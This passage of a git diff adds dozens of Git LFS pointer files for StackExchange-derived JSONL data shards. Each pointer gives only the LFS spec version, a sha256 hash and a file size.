sha256:3e135f1545c71c2fb767f06be4e399bef7a86a03759338655664868e09ee4013 +size 44099652 diff --git a/data/stackexchange/1-1/92_2289.jsonl b/data/stackexchange/1-1/92_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c59e0dda44344d392aa41955a5b7f1849d4a6f22 --- /dev/null +++ b/data/stackexchange/1-1/92_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e3075c3a4036c2c087d0e2b10caab5a392c84a1e46feb39228a4c8a9179f021d +size 39817542 diff --git a/data/stackexchange/1-1/930_2289.jsonl b/data/stackexchange/1-1/930_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5c3e13475a7d3040ccac9d0886d7d84f2ce30197 --- /dev/null +++ b/data/stackexchange/1-1/930_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:00453f757e4c7289274b262e7607acaf3e8adfe29704eedbbceabc6f30189ade +size 44179170 diff --git a/data/stackexchange/1-1/931_2289.jsonl b/data/stackexchange/1-1/931_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a0f04d446318d3b9a4c0f7e75a65e4f40011f1c4 --- /dev/null +++ b/data/stackexchange/1-1/931_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:950c73dfb25e73f2583c2f0c7211c0bd6c4659f10bd959e10b78c89057323595 +size 44117867 diff --git a/data/stackexchange/1-1/932_2289.jsonl b/data/stackexchange/1-1/932_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2843069f8cd44cdcf6ad26ba79e2239b5e775c0f --- /dev/null +++ b/data/stackexchange/1-1/932_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:77b40bb0115c628edf8f19df3c1f87b1bbd85d484e4ee1471cf5155a754dbcc6 +size 44781353 diff --git a/data/stackexchange/1-1/933_2289.jsonl b/data/stackexchange/1-1/933_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..15e3b3c4b8bf3b69aaed847e5235a41ffb3cff63 --- /dev/null +++ b/data/stackexchange/1-1/933_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8dc17641dd1f89b314bf8ff5a161253f677e52ecb2a2ef8a48b297e2aff263f3 +size 44647798 diff --git a/data/stackexchange/1-1/934_2289.jsonl b/data/stackexchange/1-1/934_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..209267f3797d12fbf3eff8339d8bc7f4eb9d80f1 --- /dev/null +++ b/data/stackexchange/1-1/934_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9dddd4e84c19f3ddd806840bc2351c704a2eb885ea543cef6890ceb86017fc92 +size 44679575 diff --git a/data/stackexchange/1-1/935_2289.jsonl b/data/stackexchange/1-1/935_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..00767a13e13a413a86d5cae6b7e508c907fdccdc --- /dev/null +++ b/data/stackexchange/1-1/935_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a56d04064f891c03b27cb7280c864abef63603e068acfa04faa41f38011aa5fe +size 44181253 diff --git a/data/stackexchange/1-1/936_2289.jsonl b/data/stackexchange/1-1/936_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2c08191ae8b12d07be6a901ba2063855290eec2a --- /dev/null +++ b/data/stackexchange/1-1/936_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9da4d6009c0433ac83565d064de5fee1bf6dd160debb282b7cd43f2fe7563715 +size 44588942 diff --git a/data/stackexchange/1-1/937_2289.jsonl b/data/stackexchange/1-1/937_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..12cef69b62370f22ee975d22b029d49398e4c101 --- /dev/null +++ b/data/stackexchange/1-1/937_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5fd360cbb65ed736faf7f73325e6b36b33c02b0ad8b0e31b1878f3f17806ca89 +size 44527615 diff --git a/data/stackexchange/1-1/938_2289.jsonl b/data/stackexchange/1-1/938_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a387370a3d7f6923216f19dd55f3a68c5a3ea4b4 --- /dev/null +++ b/data/stackexchange/1-1/938_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6aadf2752db6ad25da4c0ad68e40cf9144f9439ce7bcf2bb735e90781d4fbdfc +size 43903641 diff --git a/data/stackexchange/1-1/939_2289.jsonl b/data/stackexchange/1-1/939_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c09b647a7e529294e0c34c8734b65aa46349da0d --- /dev/null +++ b/data/stackexchange/1-1/939_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:da899fcb9ddbff048ee768e79825390e5a00d90cd29299f1d93b6f8999a5013e +size 43864214 diff --git a/data/stackexchange/1-1/93_2289.jsonl b/data/stackexchange/1-1/93_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d5ef06c3cee317083a406555ffd8beaddd33c60e --- /dev/null +++ b/data/stackexchange/1-1/93_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:67a67848a39f4fc6ba8d1f32c2d7864fddc580ba9530cfa05f8414c7841c3bc2 +size 39830712 diff --git a/data/stackexchange/1-1/940_2289.jsonl b/data/stackexchange/1-1/940_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..bbb943c59c46cb1913137f36d3ca50d97b14b745 --- /dev/null +++ b/data/stackexchange/1-1/940_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9437c27f0d757d005dd12c911904c08ca48046e9aa510a210b7c06fbd04610c2 +size 43890789 diff --git a/data/stackexchange/1-1/941_2289.jsonl b/data/stackexchange/1-1/941_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e26e63b284691deb23229840af5e23aee3f8e8b8 --- /dev/null +++ b/data/stackexchange/1-1/941_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:040f14a21d83e3eb7b7b3958ad42bd23b11996c67bd455b0cfcd4408d8841de9 +size 44433062 diff --git a/data/stackexchange/1-1/942_2289.jsonl b/data/stackexchange/1-1/942_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c6d067a32860f9b8fd02f6cc9488988c2d276220 --- /dev/null +++ b/data/stackexchange/1-1/942_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:17c6c06d0873c91555fd993f4f6facb4e60d5069c82ec7680d395c7c1f3c6a76 +size 44402400 diff --git a/data/stackexchange/1-1/943_2289.jsonl b/data/stackexchange/1-1/943_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..706a75a85c199ddb39b2c0859a74c87a23c7f80f --- /dev/null +++ b/data/stackexchange/1-1/943_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2795eec091bade2d7a49212c5f01a4c9d77b1593dcbc257b6d6b857368deba3e +size 44157644 diff --git a/data/stackexchange/1-1/944_2289.jsonl b/data/stackexchange/1-1/944_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e584cc7b8e673f2e498d092ffbebbb88fc9cae81 --- /dev/null +++ b/data/stackexchange/1-1/944_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:84c5af0c536c7a6c788fc8c2d9d97b288cd1acd066ff8a7059e84405c3bf5f06 +size 45595469 diff --git a/data/stackexchange/1-1/945_2289.jsonl b/data/stackexchange/1-1/945_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..fc1e5ba0eb32d88bca084f2be220ff2bb18b92b5 --- /dev/null +++ b/data/stackexchange/1-1/945_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1f0c57f689f9397c5c6611aca3ee32004d1d278651886c9d68325361fa0178f6 +size 44137091 diff --git a/data/stackexchange/1-1/946_2289.jsonl b/data/stackexchange/1-1/946_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f6ccce637a8dac2a8a3d6f870591a535dfc2ab50 --- /dev/null +++ b/data/stackexchange/1-1/946_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b48415b41d595cad466d5ca28149c4fc43b5afb9761abb2d661e27e7c0ac0f7d +size 44750859 diff --git a/data/stackexchange/1-1/947_2289.jsonl b/data/stackexchange/1-1/947_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..cfc6f1c636d9e78f387aa67e536fc21793a3958e --- /dev/null +++ b/data/stackexchange/1-1/947_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:253794381c70c47eb216db8b2b890b5b5adfa0452a5cceef80512e5c0def89e8 +size 44093088 diff --git a/data/stackexchange/1-1/948_2289.jsonl b/data/stackexchange/1-1/948_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..aab53989fa98d5b7af35e855bcb3a0253802f3d4 --- /dev/null +++ b/data/stackexchange/1-1/948_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:050247bf55902cff43ad1de298a408bdf9eae2499c940cad3eb6c6902d06fa30 +size 43785675 diff --git a/data/stackexchange/1-1/949_2289.jsonl b/data/stackexchange/1-1/949_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f451641de4e74d21a75199774927902a532b2379 --- /dev/null +++ b/data/stackexchange/1-1/949_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b116ea34e4ad615819ad30315e301dd4a470b225aa70fbc759e7e5da95b7ec50 +size 45009487 diff --git a/data/stackexchange/1-1/94_2289.jsonl b/data/stackexchange/1-1/94_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..89be562d8ba2c767299dd9fff0b5718b65860284 --- /dev/null +++ b/data/stackexchange/1-1/94_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:febc84af4a39f8efb32d6804706661ccdff9da1feb686959d6120ee68f55ef40 +size 39398158 diff --git a/data/stackexchange/1-1/950_2289.jsonl b/data/stackexchange/1-1/950_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..373ec29978eece93d397a62c445ecd1da837f893 --- /dev/null +++ b/data/stackexchange/1-1/950_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:936e9353489c2f425c22da3ee67ef2ef8649263e29ce2661f810823e252908a9 +size 34872808 diff --git a/data/stackexchange/1-1/951_2289.jsonl b/data/stackexchange/1-1/951_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..14c8787878e8889e7a04652f1b4ea198d425a3a9 --- /dev/null +++ b/data/stackexchange/1-1/951_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:76647eeed4989f1538152ff69821bb1897a7dc048f1d71f84f99cca13ad4b77f +size 34679040 diff --git a/data/stackexchange/1-1/952_2289.jsonl b/data/stackexchange/1-1/952_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..911a07a6e0edace2004f4d39e2a9667ba68d3b3f --- /dev/null +++ b/data/stackexchange/1-1/952_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9ef5f9e53d87b13668f620febf0484e668edeecfb1d34341e643389bbb2b36a5 +size 34604425 diff --git a/data/stackexchange/1-1/953_2289.jsonl b/data/stackexchange/1-1/953_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..07ec1daf3b2cb7c5b9b38f4528a2a32f7f84a23f --- /dev/null +++ b/data/stackexchange/1-1/953_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b4a1719cc225a946cb90b1d7ef6c4c34322d8846bb5baa08a3d17aee138497ce +size 34724862 diff --git a/data/stackexchange/1-1/954_2289.jsonl b/data/stackexchange/1-1/954_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0b9fbeec4767e37ef2ba04ced7209b613b79903b --- /dev/null +++ b/data/stackexchange/1-1/954_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5914d7900e7040267cbdd22d57190befed4a4ff05d173b17c650137a35ffe797 +size 35102315 diff --git a/data/stackexchange/1-1/955_2289.jsonl b/data/stackexchange/1-1/955_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1626b58ff3a137dafd9f5a62b4f358dceb60a7ae --- /dev/null +++ b/data/stackexchange/1-1/955_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2f306d9af922c2aebbcfee9f76502fcecdabb2ec0d37a541e064fd92577c0f5a +size 34329084 diff --git a/data/stackexchange/1-1/956_2289.jsonl b/data/stackexchange/1-1/956_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3e5b271b1ff970cbd2a568c0927bbb0b8814b2bf --- /dev/null +++ b/data/stackexchange/1-1/956_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:541fd2a6dcb174d911e7cf3ac91f62b545601d4932097c1201071ebbde9eab7f +size 35093793 diff --git a/data/stackexchange/1-1/957_2289.jsonl b/data/stackexchange/1-1/957_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..42030c351c7a893faef76f10b7d466124796ee49 --- /dev/null +++ b/data/stackexchange/1-1/957_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b648e5f2efb9d55d9a25b2fd5b3026ebb7f81a66183a212252fa010b5950fffa +size 34438058 diff --git a/data/stackexchange/1-1/958_2289.jsonl b/data/stackexchange/1-1/958_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c32abb339ae36add5e61a8480769a8913dadd1a4 --- /dev/null +++ b/data/stackexchange/1-1/958_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:84d7da010f5389f1737f321b554d06456a0a9aad8726a128718e7f7404affa05 +size 34685288 diff --git a/data/stackexchange/1-1/959_2289.jsonl b/data/stackexchange/1-1/959_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2e9566d9ef570fd3a3ed5b1e435502aa859fdf3e --- /dev/null +++ b/data/stackexchange/1-1/959_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c97e9b5f0a49378b39d860705adca35cbd8d62a6f71d38ca6a7d476eca311854 +size 34301964 diff --git a/data/stackexchange/1-1/95_2289.jsonl b/data/stackexchange/1-1/95_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..86be435d78e8cd610455d19ae71a4bc477d7e8bc --- /dev/null +++ b/data/stackexchange/1-1/95_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:6feadce2fcc357e92e5c1ca5d84e1475bb79ba1c75e3ea1ead41b974df77c1e7 +size 38967060 diff --git a/data/stackexchange/1-1/960_2289.jsonl b/data/stackexchange/1-1/960_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0a8983bf6c804f7a7a4fda26dea2314f4a0f0476 --- /dev/null +++ b/data/stackexchange/1-1/960_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:22484299e6d21c65a588352770a75eed5f3eaa1114c82ba6d8ced801a1fd36d4 +size 34779580 diff --git a/data/stackexchange/1-1/961_2289.jsonl b/data/stackexchange/1-1/961_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..96f21fb5c86307b86fe1110144811f1b0e4cc436 --- /dev/null +++ b/data/stackexchange/1-1/961_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2256a502459a1b70aadc8d54c9f1706296d5f9e77e91ebb56d5ea5a1b916479c +size 34536169 diff --git a/data/stackexchange/1-1/962_2289.jsonl b/data/stackexchange/1-1/962_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9d72260c14b98c55155ca9799f8b635d50fa3cfd --- /dev/null +++ b/data/stackexchange/1-1/962_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:aec0554e5805c10ce6ed9552a38964c1ca010ae90d39da606df20fbc4741aacb +size 35322025 diff --git a/data/stackexchange/1-1/963_2289.jsonl b/data/stackexchange/1-1/963_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..91f87ae0485b1208d467ebb322093d975397a26b --- /dev/null +++ b/data/stackexchange/1-1/963_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fad63984384419a312f0bf7cea0d2dd5e39a008ae9a06f7c19259082852c98a4 +size 34495927 diff --git a/data/stackexchange/1-1/964_2289.jsonl b/data/stackexchange/1-1/964_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ed6c26ddffd746fb56c414d9663f0c186c4547c6 --- /dev/null +++ b/data/stackexchange/1-1/964_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5d7887852f3166e7ae0e74cca77b5de4aedc5cb6217431596ee70828c4daf939 +size 34995690 diff --git a/data/stackexchange/1-1/965_2289.jsonl b/data/stackexchange/1-1/965_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b3e5252dbdd6cfac6ed893be516c28acbb4f55c3 --- /dev/null +++ b/data/stackexchange/1-1/965_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c150b35b85932f7d026818a12780d201f40acd5d977eabc43b4452ab2445c0e7 +size 34566631 diff --git a/data/stackexchange/1-1/966_2289.jsonl b/data/stackexchange/1-1/966_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8aea897e88f5d4ae1515f47cb0260fb69718bc8a --- /dev/null +++ b/data/stackexchange/1-1/966_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2c29dc7f6b0223822e44f4b48edc3329a5f9d20013fd58dad9960c4ebef69cb0 +size 35091688 diff --git a/data/stackexchange/1-1/967_2289.jsonl b/data/stackexchange/1-1/967_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f5db011ff27c6ffe3c65a5238c308f9523796493 --- /dev/null +++ b/data/stackexchange/1-1/967_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0558f5e58b6568cded23a93409fc03ba3dd0e41c61b09f7afe6fff29542da4c8 +size 34940797 diff --git a/data/stackexchange/1-1/968_2289.jsonl b/data/stackexchange/1-1/968_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..693c5c6ffaae5686e1e67e99e71a2144e8487b53 --- /dev/null +++ b/data/stackexchange/1-1/968_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9534de7cde275a632cac7decb76250281b7842eef1c4d3eff7154ecc29d15e2d +size 34432024 diff --git a/data/stackexchange/1-1/969_2289.jsonl b/data/stackexchange/1-1/969_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b8ceb63bf817debafdef7ee6e20bfe09b623d371 --- /dev/null +++ b/data/stackexchange/1-1/969_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1147c2f43c67d3160d0775274ef8cbff94900b854c90b3276c9039286c220fb8 +size 34412781 diff --git a/data/stackexchange/1-1/96_2289.jsonl b/data/stackexchange/1-1/96_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..02338c03fad068dabd34fb8d863c604a9614c982 --- /dev/null +++ b/data/stackexchange/1-1/96_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:da1db89e02e67dcd713700da5c3445b1eab875d7399fa8ea54e1f54efa8c9d92 +size 39066914 diff --git a/data/stackexchange/1-1/970_2289.jsonl b/data/stackexchange/1-1/970_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a3500eb79d0b47ec2e5b2ad446333f8b6c06fa5e --- /dev/null +++ b/data/stackexchange/1-1/970_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:57bd4a4f63f720a3c462c0e621d14cac4be92508829033dee44a5b9dc1871f10 +size 34395386 diff --git a/data/stackexchange/1-1/971_2289.jsonl b/data/stackexchange/1-1/971_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9acaa083d6bbdedc423470c5201ed7880ad21f62 --- /dev/null +++ b/data/stackexchange/1-1/971_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:dac2421e3847a265c0e59b3a2a67bef725b1d6dc66712bbce2a4fdb2be86167f +size 34707100 diff --git a/data/stackexchange/1-1/972_2289.jsonl b/data/stackexchange/1-1/972_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..53d1704af88eafe74ba1bc995dc9c20d67eafceb --- /dev/null +++ b/data/stackexchange/1-1/972_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:98f41942944abc1d831bf7b64b81add960c75463b46054ce89e8ab4b1ef4fc0e +size 34517294 diff --git a/data/stackexchange/1-1/973_2289.jsonl b/data/stackexchange/1-1/973_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ed4eb3c2e7a7d09d6fbc43112c8f55c86e9b3d99 --- /dev/null +++ b/data/stackexchange/1-1/973_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:46fd38d42f9418721260563d4c571b05e79119572f0fb48e7de6caaef0c01610 +size 34402624 diff --git a/data/stackexchange/1-1/974_2289.jsonl b/data/stackexchange/1-1/974_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3d93461a8c0c7cf194569ecd50a20e7e4e116bfb --- /dev/null +++ b/data/stackexchange/1-1/974_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b0e5bd56b89849f3b45058b697de4a108e6d4a2c46f7aca3cdd682be2778982d +size 34718595 diff --git a/data/stackexchange/1-1/975_2289.jsonl b/data/stackexchange/1-1/975_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..64984c663f5a6e5def5d3a2f10488e8690162c92 --- /dev/null +++ b/data/stackexchange/1-1/975_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:6167f15bff21b1b08e969c971a0e0736c73db9e43ac0f6913064ea7f08145236 +size 34862811 diff --git a/data/stackexchange/1-1/976_2289.jsonl b/data/stackexchange/1-1/976_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a44d6ef953d119253e51c15a8526e2de593bc090 --- /dev/null +++ b/data/stackexchange/1-1/976_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9ed766b1f5b134f766b02e5ab483bf9b411a731aaa8103490915f288177d4f6a +size 34704173 diff --git a/data/stackexchange/1-1/977_2289.jsonl b/data/stackexchange/1-1/977_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..bda5db225dd8f384bcb607f9db05e69a40360708 --- /dev/null +++ b/data/stackexchange/1-1/977_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b9d7c78de0a28602f73a8aaae811ac6f27c2d4236eec2cb2c802931dcc508be9 +size 34834658 diff --git a/data/stackexchange/1-1/978_2289.jsonl b/data/stackexchange/1-1/978_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3f9647b169fa11e9d25849fbc62ee9e68f26dc68 --- /dev/null +++ b/data/stackexchange/1-1/978_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1fb167fa3bc3f044f1759a33ee41a2af46121e09f8ef402df4ff34ab3c5f8fb0 +size 34274146 diff --git a/data/stackexchange/1-1/979_2289.jsonl b/data/stackexchange/1-1/979_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..233279429bba4262245aa1a31676f10fd285a41e --- /dev/null +++ b/data/stackexchange/1-1/979_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:52bc15c9b3722cb359e2488d4f842d581e38d57d7e4bcc4859e867422249abe2 +size 35072232 diff --git a/data/stackexchange/1-1/97_2289.jsonl b/data/stackexchange/1-1/97_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..873a27cc5a409fb40429948b5704e8dd5d9f1129 --- /dev/null +++ b/data/stackexchange/1-1/97_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:cbc40f0ae6b37cdaa5add1b8f1ba19dd27270a2cb96a81420163de948f2194ef +size 38583437 diff --git a/data/stackexchange/1-1/980_2289.jsonl b/data/stackexchange/1-1/980_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5ef908af69b7a4fdb9ecccc57cd12f5d6820339f --- /dev/null +++ b/data/stackexchange/1-1/980_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7e430ae3df4d54b13873a3e9188bb5383edb19a091aa448f67d83e1534b93ec2 +size 34467887 diff --git a/data/stackexchange/1-1/981_2289.jsonl b/data/stackexchange/1-1/981_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c60311943a6a052854c07039628e88a968a30e8f --- /dev/null +++ b/data/stackexchange/1-1/981_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:56f4e4fc9d888f7661951895b9008e3b2a0b8a2734684f7e8b701b465bebf2a7 +size 34985113 diff --git a/data/stackexchange/1-1/982_2289.jsonl b/data/stackexchange/1-1/982_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d93ce827f7daf04b6b579bd07a32093da970e0b1 --- /dev/null +++ b/data/stackexchange/1-1/982_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e6c82805e79035de87c0d2727e6274c1d24acac02b477c48c38817bdb7e9ddf4 +size 34800693 diff --git a/data/stackexchange/1-1/983_2289.jsonl b/data/stackexchange/1-1/983_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..cf8bacd79dac8341f9abb7542e92fd1d0dcd1b12 --- /dev/null +++ b/data/stackexchange/1-1/983_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4224c791a57f9816337fa47abe62b0ac1c2567cf2e9b8775f2002bd7ee4582c5 +size 34242085 diff --git a/data/stackexchange/1-1/984_2289.jsonl b/data/stackexchange/1-1/984_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..da3bd1265aff43e426ca85af9e2c5efee8ea2cfb --- /dev/null +++ b/data/stackexchange/1-1/984_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6dcfb8e8c536d8cbed9cd3085ad8f645dc57771b0ca7b7b5c4dc1c681e65f9c6 +size 35593427 diff --git a/data/stackexchange/1-1/985_2289.jsonl b/data/stackexchange/1-1/985_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e2e9212ec0d4af3d5f6d0b3e8092b9939e90db33 --- /dev/null +++ b/data/stackexchange/1-1/985_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a5ed05247818f57d9875f373f5a537c5d86b3636ab529c4d7c9181b347700b17 +size 34664799 diff --git a/data/stackexchange/1-1/986_2289.jsonl b/data/stackexchange/1-1/986_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4039daf4512ea922d67580966d60e0d81b5dd2ce --- /dev/null +++ b/data/stackexchange/1-1/986_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:513b14f632c4b54b24c176ced3a6dc918984d819a8ec0837829055ff6948b601 +size 34801627 diff --git a/data/stackexchange/1-1/987_2289.jsonl b/data/stackexchange/1-1/987_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c8398ae3b7f3f1d2144f1859d7ad3bb4571e92bb --- /dev/null +++ b/data/stackexchange/1-1/987_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:99338c80984bbd77c28295bcd035f044eebeb52230000e4344a089557e236050 +size 34345515 diff --git a/data/stackexchange/1-1/988_2289.jsonl b/data/stackexchange/1-1/988_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ca6ba1c2b6e1ff885763e1996ff1388184a77c7c --- /dev/null +++ b/data/stackexchange/1-1/988_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ba24543b1d57d48afdc5c8908125220305ddbe520298ab8686635d185ecf2be5 +size 34981447 diff --git a/data/stackexchange/1-1/989_2289.jsonl b/data/stackexchange/1-1/989_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..63bc3c0df9d59b2c412313ea55f595e786043163 --- 